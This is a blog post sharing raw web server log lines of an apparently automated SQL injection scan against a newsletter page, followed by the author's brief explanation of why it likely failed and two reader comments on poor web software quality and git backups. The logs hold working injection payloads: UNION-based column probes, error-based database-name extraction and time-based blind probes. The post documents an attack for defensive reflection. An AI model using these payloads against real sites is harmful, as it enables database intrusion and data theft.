176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cdatabase%28%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%27%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%27%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20concat%28version%28%29%2C0x7233646D3076335F73716C5F696E6A656374696F6E%29%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29%20as%20nvarchar%284000%29%29%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:38 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28106%29%7C%7Cchr%28101%29%7C%7Cchr%2899%29%7C%7Cchr%28116%29%7C%7Cchr%28105%29%7C%7Cchr%28111%29%7C%7Cchr%28110%29%29-- HTTP/1.1" 200 284

Explanation of 0x31303235343830303536 can be found at Site has been hacked via SQL Injection.

In this case it seems we had just attempt to hack as id was not the right place to brute yourself in – there was a check for if (!intval($this->id)) and another parameter was required… but no prepare, just simple queries with slightly sanitized inputs.

Brrrr… must remove all non-cared-for code.

Postitatud rubriiki cybercrime. Talleta püsiviide. Kommenteerimine ja trackback-viidete lisamine ei ole lubatud.

2 Kommentaarid

  1. Martin Vahi
    Lisatud 17. sept. 2014 kell 07:23 | Püsiviide

    If SQL-injection is possible in modern software that has thousands of installations and tens of developers, then that certainly shows that the developers of that software do a really shoddy job or they joined the project at stage, when the technical quality of the project was already ruined. As end users tend to assess products by functionality alone, not reliability, there is no business case for producing high quality software. Reliability in terms of withstanding crackers and otherwise attackers is the property that is called security and if elemental algorithmic complexities and memory usage related issues are overlooked in web applications, then one can just imagine, how hopeless it is that an “average” business-software developer spends any reasonable amount of time thinking about security issues. I hate to be that blunt, but the truth is that when I started to work on web software, I often swore in my mind by thinking, why is it that whenever the word “web” enters “software development”, it essentially means “piece of shit”. To top that all up, I tried to find a web based forum software that has at least style-wise well structured code and out of practically all major, more popular, forum applications that I found on GitHub, out of about 10 products, there was only one that did not have a gigantic main function and a general mess and that single one, to my disappointment, was written in C#, which I did not like, because the C# is a Microsoft product and Microsoft has a really bad reputation as a player.

    Anyways, what I do to mitigate website attack related issues is that I have a Bash script that creates a folder, year_month_day, places database dumps of all of my information systems into that folder. After executing the Bash script, I recursively copy everything, including the database dumps, from the web hosting account to a git repository at my personal computer. The git detects modifications between different back-up versions and makes it feasible to repeatedly back up the tens of Gibibytes of files that make up my site. The database dumps are actually text files that contain SQL-statements. The git can, probably, I haven’t verified, detect the differences between the different backup versions of the database dumps and, hopefully, store only the changes. As the database dumps can be hundreds of Mebibytes large, the diff based approach of git comes very handy. Should someone break in, their changes will be in the same change set with non-malicious changes, but at least I can, hopefully, limit the amount of files and file regions that I have to analyze. Of course, You shouldn’t use Windows for making the backups, because regardless of various “FinSpies” the Windows file system has always been a slow and unreliable crap, if compared to ext4, jfs, Raiserfs, etc. Again, end users are happy with functionality and technical quality is shoved down the drain.

    • petskratt
      Lisatud 17. sept. 2014 kell 08:21 | Püsiviide

      hmm, haven’t thought about “what GIT stores” – did some reading / testing and seems, that stored are compressed versions of full files, not diffs…

      but yes, adding “web” changes a lot in “software development” – it becomes something anybody can “program using google”… meaning all more complex and less-scriptish approaches can’t be used as they require some level of understanding what you are doing :-)